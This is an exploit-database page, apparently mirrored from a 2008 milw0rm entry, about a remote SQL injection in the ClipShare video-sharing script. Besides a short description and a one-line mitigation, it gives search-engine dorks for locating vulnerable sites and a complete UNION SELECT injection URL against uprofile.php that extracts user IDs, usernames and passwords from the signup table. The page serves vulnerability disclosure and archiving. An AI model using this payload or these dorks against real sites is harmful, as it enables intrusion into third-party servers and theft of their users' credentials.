header-logo
Suggest Exploit
vendor:
video sharing www.clip-share.com
by:
Krit webmaster
8.8
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: video sharing www.clip-share.com
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

video sharing www.clip-share.com Remote SQL Injection Exploit All Version

A vulnerability exists in video sharing www.clip-share.com which allows an attacker to inject arbitrary SQL commands into the application. This can be exploited to gain access to sensitive information such as usernames and passwords. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#########################################################################
          video sharing www.clip-share.com Remote SQL Injection Exploit All Version

#########################################################################
AUTHOR :Krit webmaster of http://www.thaishadow.com
HOME : http://www.thaishadow.com
Download : http://www.clip-share.com/
###########################################################################
DorKs :inurl:/uprofile.php?UID=
or
"Powered by clipshare"
###########################################################################
## EXPLOIT :
http://server.com/Path/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*
###########################################################################
## GREETZ  : Exploiters,Pongz,{OHM},Usermode,windows98SE,azazel,Tesz,Mr`Ping
###########################################################################

# milw0rm.com [2008-01-02]